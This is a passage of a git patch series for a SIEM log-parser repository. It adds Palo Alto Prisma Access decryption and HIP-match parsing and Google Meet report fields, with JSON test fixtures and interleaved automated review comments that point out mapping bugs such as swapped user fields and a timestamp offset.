HighResolutionTimestamp + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..140e7657e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json 
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From f35315945b88ff7a1085f7d2e531cac1196f78d8 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc
Date: Thu, 21 Nov 2024 17:55:42 +0100
Subject: [PATCH 63/84] fix(PaloAlto): improve support for decryption events
---
 .../paloalto-prisma-access/_meta/fields.yml | 15 +++
 .../paloalto-prisma-access/ingest/parser.yml | 10 ++
 .../tests/test_decryption_json.json | 119 ++++++++++++++++++
 3 files changed, 144 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json
diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
index 6382be28b..3b3fd8fc6 100644
--- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
@@ -297,3 +297,18 @@ paloalto.threat.name:
 description: The name of the threat
 name: paloalto.threat.name
 type: keyword
+
+paloalto.tls.chain_status:
+ description: The trust in the TLS chain
+ name: paloalto.tls.chain_status
+ type: keyword
+
+paloalto.tls.root_status:
+ description: The trust in the root certificate
+ name: paloalto.tls.root_status
+ type: keyword
+
+paloalto.tls.sni:
+ description: The server name indication
+ name: paloalto.tls.sni
+ type: keyword
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 63f72e8e0..8da957210 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
@@ -636,6 +636,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -809,6 +816,9 @@ stages: paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}" paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}" paloalto.threat.name: "{{parsed_threat.message.threat_description}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: source.user.name: "{{parsed_event.message.SourceUser}}" user.name: "{{parsed_event.message.SourceUser}}" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json new file mode 100644 index 000000000..35fa4abec 
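Review bot: The new `tls.cipher` line references `parsed_event.message.message.TLS_AUTH` (a doubled `.message.`), which can never resolve, and both fixtures confirm it: test_decryption_json.json and test_decryption_csv.json end up with no `tls.cipher` even though the key-exchange, encryption and auth fields are populated in both samples. The JSON event also names these fields differently from the CSV columns used in the templates (`TLSAuth` vs `TLS_AUTH`, `CommonName` vs `SubjectCommonName`, `CertificateSerial` vs `CertificateSerialNumber`), so `tls.server.x509.subject.common_name` and `tls.server.x509.serial_number` are silently empty for JSON input too — the JSON fixture has neither; the `or` fallback the surrounding lines already use, e.g. `tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName or parsed_event.message.CommonName}}"` and `tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber or parsed_event.message.CertificateSerial}}"`, would cover both dialects. Be aware as well that `TLS_<kx>_<enc>_<auth>` is not an IANA cipher-suite name (TLS 1.3 suites carry no key-exchange component), so consumers matching ECS `tls.cipher` against standard suite names may not match; a comment documenting the constructed form, or separate vendor fields for the three components, avoids that surprise. `TLSVersion[3:]` assumes the `TLS` prefix and an always-present value; depending on how the template engine treats undefined values, slicing a missing field may raise rather than render empty, so a guard or an `if` is worth confirming. The enclosing `set` stage starts outside the hunk.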
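Review bot: `paloalto.tls.chain_status` and `paloalto.tls.root_status` copy the vendor strings verbatim, and the fixtures show the casing is not consistent across the two (`RootStatus: "trusted"` beside `ChainStatus: "Trusted"`, `"uninspected"` beside `"Uninspected"`), so any detection keyed on these values — an untrusted chain or root is the security-relevant signal in decryption logs — has to enumerate every casing. Normalising at ingest, e.g. `paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus | lower}}"` and the same for `RootStatus`, yields a stable keyword; the fixtures' expected values would then change accordingly. The decryption logs also carry the failure reason (`ErrorIndex`/`ErrorMessage` in JSON, `ErrorIndex`/`Error` in the CSV columns) and certificate validity (`TimeNotBefore`/`TimeNotAfter`), none of which are mapped here; `error.message` and `tls.server.not_before`/`tls.server.not_after` are the ECS homes for these and are what an analyst triaging a decryption failure looks at first.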
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json
@@ -0,0 +1,119 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } +} \ No newline at end of file From c93a4a974e1e4417b0c7e4496cfc9327ed6b3160 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:57:01 +0100 Subject: [PATCH 64/84] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-prisma-access/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 8da957210..d212c5fcc 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml 
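Review bot: In the expected output `user.domain` is `jdoe` and `user.name` is `example`, the reverse of `source.user.domain: example` / `source.user.name: jdoe` derived from the same `SourceUser` value `example\\jdoe`; one of the two pairs is wrong, and because the fixture pins parser output it would lock in the swapped `user.*` pair. If the parser really emits this, the defect is in the stage that splits `user.name` on the backslash (outside this commit's hunks — the `set` in parser.yml only copies `SourceUser` into `user.name`); if not, the fixture should read `"domain": "example", "name": "jdoe"`. Detections and entity resolution keyed on `user.name` would otherwise see the domain as the account.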
@@ -425,6 +425,124 @@ pipeline: - ClusterName delimiter: "," + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - 
DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json new file mode 100644 index 000000000..8a060536e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json 
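Review bot: The column list contains `FUTURE_USE` twice in a row; with name-keyed output from `dsv.parse-dsv` the second presumably overwrites the first, which is harmless only while neither is referenced, so either distinct names (`FUTURE_USE_1`, `FUTURE_USE_2`) or a comment such as `# two reserved columns; name collision is intentional, do not map` would make that explicit. `UUIDforrule` (populated as `25185364-4f1b-46b5-a376-a96a9438d665` in the CSV sample) does not surface as `rule.uuid` in test_decryption_csv.json's expected output, whereas the JSON path gets `rule.uuid` from `RuleUUID`; if the `rule.uuid` mapping keys on the column name the other CSV types use, aligning this column's name with it would pick the value up without a new mapping. The rule UUID is the stable identifier for pivoting across PAN-OS log types, so losing it only on the decryption CSV path is worth fixing before merge.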
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": 
"5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 652c3ba67b29328a991970be1b7ea34412123e40 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:33:29 +0100 Subject: [PATCH 65/84] Google Report: add source.ip and user.email --- Google Cloud/google-report/ingest/parser.yml | 2 + .../google-report/tests/test_end_call.json | 59 +++++++++++++++++++ .../tests/test_end_call_no_ip.json | 44 ++++++++++++++ .../tests/test_meet_sample1.json | 9 ++- 4 files changed, 113 insertions(+), 1 deletion(-) create mode 100644 Google Cloud/google-report/tests/test_end_call.json create mode 100644 Google Cloud/google-report/tests/test_end_call_no_ip.json diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 4213a66c9..a52024ed9 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml 
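Review bot: The expected `@timestamp` `2024-11-03T19:09:43Z` reproduces `GenerateTime` (`2024/11/03 19:09:43`, no offset) as UTC, while the same event's `HighResTimestamp` is `2024-11-03T19:09:43.654+01:00`, i.e. `18:09:43.654Z`; the HIPMATCH fixture from the preceding commit resolves `2024-11-03T18:50:04.310+01:00` to `17:50:04.310000Z`, so the DECRYPTION CSV path appears to pick a different time source and lands an hour off for this sample. The date-parsing stage (`parsed_timestamp`) is outside these hunks, so this may be a field-precedence issue there rather than in the new column list, but the fixture as written pins the shifted value. A one-hour skew between decryption events and the rest of the intake is exactly what breaks timeline correlation in an investigation, so it should be settled before this is merged.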
@@ -161,6 +161,8 @@ stages: network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}' google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}' + user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}' + source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}' set_groups_enterprise_fields: actions: diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json new file mode 100644 index 000000000..21a51a926 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call.json 
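Review bot: `user.email` is now filled from `organizer_email`, which identifies the meeting organizer rather than the actor of the event, so for `call_ended` records whose participant is anonymous or external (the `HANGOUTS_EXTERNAL_OR_ANONYMOUS` actor in the new fixtures) the organizer's address is attributed to the participant's `source.ip`, and where an actor email already existed it is overwritten — the change to test_meet_sample1.json moves `user.email` from `jone.doe@test.com` to `joe.done@test.com` while `user.name` stays `jone.doe`, presumably because the organizer parameter now clobbers the actor's address. A vendor-scoped field such as `google.report.meet.organizer_email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}'` keeps the organizer without corrupting the actor identity that `user.*` is meant to carry. The new `source.ip` also sits beside existing geo that test_end_call.json shows under `client.geo.*`, so `client.ip` (or moving the geo to `source.geo`) would keep the endpoint's address and location under one ECS object. The same defect is visible in test_end_call.json, test_end_call_no_ip.json and test_meet_sample1.json; the enclosing stage starts outside the hunk.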
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\"